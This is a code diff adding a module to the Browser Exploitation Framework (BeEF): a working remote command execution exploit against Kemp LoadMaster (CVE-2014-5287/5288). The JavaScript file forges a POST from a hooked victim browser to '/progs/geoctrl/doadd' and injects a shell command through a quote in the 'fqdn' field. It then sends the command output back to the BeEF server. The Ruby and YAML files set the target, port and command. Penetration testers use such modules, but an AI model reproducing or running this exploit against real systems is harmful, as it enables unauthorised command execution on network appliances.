Kemp Load Master RCE - BeEF module

modules/exploits/kemp_command_execution/command.js

@@ -0,0 +1,37 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+
+	var path    = '/progs/geoctrl/doadd';
+	var cmd     = "<%= @cmd %>";
+
+	if (rhost.substring(0,5) == "https") {
+		rhost = rhost.replace("https://","")
+		protocol = "https"
+	}
+	else {
+		rhost = rhost.replace("http://","")
+		protocol = "http"
+	}
+
+
+	beef.net.forge_request(protocol, "POST", rhost, rport, path, null, null, { fqdn: "' <%= @cmd %>'" }, 10, 'html', false, null, function(response) { 
+		resp = response.headers+response.response_body;
+		start = resp.indexOf("Content-Type: text/html");
+		end = resp.indexOf("Cache-Control: no-cache");
+		final = resp.slice(start+23,end)
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, final)
+		});
+
+
+
+	});

modules/exploits/kemp_command_execution/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        kemp_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "Kemp LoadBalancer Command Execution"
+            description: "This module exploits a remote code execution vulnerability in Kemp LoadBalancer 7.1-16.<br/>More information can be found here: <a href='http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html'>http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html</a><br/>"
+            authors: ["Roberto Suggi Liverani", "@malerisch", "CVE-2014-5287","CVE-2014-5288"]
+            target:
+                working: ["ALL"]

modules/exploits/kemp_command_execution/module.rb

@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Kemp_command_execution < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'URL', 'value' => 'https://x.x.x.x'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '443'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Command',    'description' => 'Enter shell command to execute.', 'type'=>'textarea', 'value'=>"ls", 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end